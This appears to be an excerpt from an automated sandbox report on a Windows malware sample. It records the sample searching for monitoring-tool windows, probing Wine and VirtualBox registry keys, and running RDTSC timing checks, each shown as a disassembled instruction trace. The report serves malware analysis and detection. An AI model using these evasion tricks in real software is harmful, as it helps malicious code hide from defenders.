Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Window searched: window name: Regmonclass	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 5C8169 second address: 5C816D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 5C816D second address: 5C8182 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE0761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 5C8182 second address: 5C7A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CEC76E1FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F8CEC76E202h 0x00000011 jmp 00007F8CEC76E200h 0x00000016 push dword ptr [ebp+122D0D01h] 0x0000001c add dword ptr [ebp+122D2E24h], edx 0x00000022 call dword ptr [ebp+122D18FCh] 0x00000028 pushad 0x00000029 js 00007F8CEC76E1FCh 0x0000002f xor eax, eax 0x00000031 jnp 00007F8CEC76E202h 0x00000037 jg 00007F8CEC76E1FCh 0x0000003d jnc 00007F8CEC76E1F6h 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 pushad 0x00000048 add ebx, 33925491h 0x0000004e and edi, 73B2AC08h 0x00000054 popad 0x00000055 mov dword ptr [ebp+122D2CB9h], eax 0x0000005b sub dword ptr [ebp+122D1911h], esi 0x00000061 mov esi, 0000003Ch 0x00000066 pushad 0x00000067 or si, 7A1Bh 0x0000006c popad 0x0000006d add esi, dword ptr [esp+24h] 0x00000071 jmp 00007F8CEC76E1FCh 0x00000076 add dword ptr [ebp+122D1911h], edi 0x0000007c lodsw 0x0000007e stc 0x0000007f add eax, dword ptr [esp+24h] 0x00000083 clc 0x00000084 sub dword ptr [ebp+122D32B7h], esi 0x0000008a mov ebx, dword ptr [esp+24h] 0x0000008e pushad 0x0000008f or edx, dword ptr [ebp+122D2BA1h] 0x00000095 mov dword ptr [ebp+122D32B7h], eax 0x0000009b popad 0x0000009c nop 0x0000009d push eax 0x0000009e push edx 0x0000009f je 00007F8CEC76E1F8h 0x000000a5 pushad 0x000000a6 popad 0x000000a7 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 72C079 second address: 72C084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 72C084 second address: 72C0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F8CEC76E204h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 72C0A8 second address: 72C0AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 72C0AC second address: 72C0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 72C0B2 second address: 72C0B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 742697 second address: 74269B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 74269B second address: 7426A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8CECAE0756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 74298B second address: 742995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 742995 second address: 74299B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 74299B second address: 7429A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7456C6 second address: 7456CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7456CA second address: 7456D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7456D0 second address: 7456D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7457F9 second address: 745863 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8CEC76E1FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [ebp+122D2D1Dh], eax 0x00000011 push 00000003h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F8CEC76E1F8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f jl 00007F8CEC76E1F8h 0x00000035 mov cl, dl 0x00000037 push 00000003h 0x00000039 jmp 00007F8CEC76E202h 0x0000003e call 00007F8CEC76E1F9h 0x00000043 pushad 0x00000044 pushad 0x00000045 pushad 0x00000046 popad 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a push edi 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 745953 second address: 7459DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CECAE0763h 0x00000008 jbe 00007F8CECAE0756h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F8CECAE0765h 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F8CECAE0758h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 xor cx, F05Ch 0x00000037 push 00000000h 0x00000039 call 00007F8CECAE0764h 0x0000003e mov dword ptr [ebp+122D2F1Ah], ecx 0x00000044 pop ecx 0x00000045 mov edx, 21BCF874h 0x0000004a push 370EA6D1h 0x0000004f push eax 0x00000050 push edx 0x00000051 push edi 0x00000052 jnc 00007F8CECAE0756h 0x00000058 pop edi 0x00000059 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7459DF second address: 745A63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007F8CEC76E1F6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 370EA651h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F8CEC76E1F8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d movsx edx, ax 0x00000030 or si, 5BEFh 0x00000035 push 00000003h 0x00000037 call 00007F8CEC76E1FCh 0x0000003c mov edi, dword ptr [ebp+122D2C85h] 0x00000042 pop edx 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ecx 0x00000048 call 00007F8CEC76E1F8h 0x0000004d pop ecx 0x0000004e mov dword ptr [esp+04h], ecx 0x00000052 add dword ptr [esp+04h], 0000001Dh 0x0000005a inc ecx 0x0000005b push ecx 0x0000005c ret 0x0000005d pop ecx 0x0000005e ret 0x0000005f push 00000003h 0x00000061 mov esi, edi 0x00000063 call 00007F8CEC76E1F9h 0x00000068 pushad 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 745A63 second address: 745A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8CECAE0756h 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007F8CECAE0756h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 745A7E second address: 745A84 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 745BAE second address: 745C00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007F8CECAE075Ah 0x00000011 push edi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop edi 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jmp 00007F8CECAE0761h 0x0000001e mov eax, dword ptr [eax] 0x00000020 jmp 00007F8CECAE0760h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a pushad 0x0000002b jmp 00007F8CECAE075Eh 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 764FAC second address: 764FB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 765280 second address: 76528A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8CECAE0756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 765548 second address: 765566 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8CEC76E205h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 765566 second address: 76556C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 765FA5 second address: 765FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CEC76E202h 0x00000009 jns 00007F8CEC76E1F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 75A1FD second address: 75A224 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE0765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8CECAE075Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7668E2 second address: 7668E8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7668E8 second address: 7668EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7668EE second address: 7668F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8CEC76E1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7668F8 second address: 766907 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8CECAE0756h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 766907 second address: 766950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8CEC76E1F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F8CEC76E208h 0x00000013 jmp 00007F8CEC76E1FAh 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c jmp 00007F8CEC76E205h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 766950 second address: 766954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 766D39 second address: 766D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8CEC76E1FDh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 766D4F second address: 766D55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 769BC9 second address: 769BDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8CEC76E1FBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7345AD second address: 7345BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7345BC second address: 7345C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7345C0 second address: 7345C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 770D8D second address: 770D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CEC76E1FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 77032C second address: 770336 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8CECAE0756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 770336 second address: 770352 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F8CEC76E1F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f jno 00007F8CEC76E1FAh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 770352 second address: 770358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 770358 second address: 770360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 77049F second address: 7704E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE0763h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F8CECAE0766h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push ecx 0x00000017 jmp 00007F8CECAE075Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7704E4 second address: 7704ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7704ED second address: 770503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CECAE0762h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 77065E second address: 770662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 770981 second address: 770999 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8CECAE075Dh 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773FAA second address: 773FCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CEC76E204h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 773FCC second address: 773FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7742F8 second address: 7742FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7742FE second address: 774302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 774302 second address: 774306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 775729 second address: 77572F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 77572F second address: 775734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 775734 second address: 775776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jo 00007F8CECAE075Ah 0x0000000e push ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ecx 0x00000012 nop 0x00000013 mov si, F79Ch 0x00000017 push 00000000h 0x00000019 mov esi, dword ptr [ebp+122D332Fh] 0x0000001f push 00000000h 0x00000021 mov esi, ebx 0x00000023 call 00007F8CECAE0762h 0x00000028 mov edi, dword ptr [ebp+122D2B31h] 0x0000002e pop esi 0x0000002f push eax 0x00000030 push ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 775776 second address: 77577A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7762FA second address: 7762FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7762FE second address: 776322 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+1244FB22h], eax 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122DB7B9h], ecx 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D2DFCh], eax 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 776322 second address: 776327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 776BAB second address: 776BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7780C7 second address: 778141 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE075Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c je 00007F8CECAE0756h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F8CECAE0758h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e jmp 00007F8CECAE075Bh 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007F8CECAE0758h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f xchg eax, ebx 0x00000050 pushad 0x00000051 jmp 00007F8CECAE0760h 0x00000056 push eax 0x00000057 push edx 0x00000058 jl 00007F8CECAE0756h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 777E44 second address: 777E60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CEC76E208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 779BB1 second address: 779BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 779BB5 second address: 779BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F8CEC76E20Eh 0x0000000c pop ecx 0x0000000d push esi 0x0000000e pushad 0x0000000f jmp 00007F8CEC76E1FDh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 779BEB second address: 779BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 77A248 second address: 77A2F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CEC76E1FCh 0x00000008 jmp 00007F8CEC76E208h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F8CEC76E1F8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov esi, dword ptr [ebp+122DB7EDh] 0x00000033 push 00000000h 0x00000035 mov esi, dword ptr [ebp+122D2BA5h] 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F8CEC76E1F8h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 0000001Ch 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 xchg eax, ebx 0x00000058 jmp 00007F8CEC76E1FFh 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F8CEC76E205h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 77AB75 second address: 77AB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
